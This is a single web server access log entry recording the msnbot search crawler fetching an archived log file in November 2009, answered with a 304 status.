65.55.106.234 - - [13/Nov/2009:21:28:55 -0600] "GET /logs/access_log.1123545600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
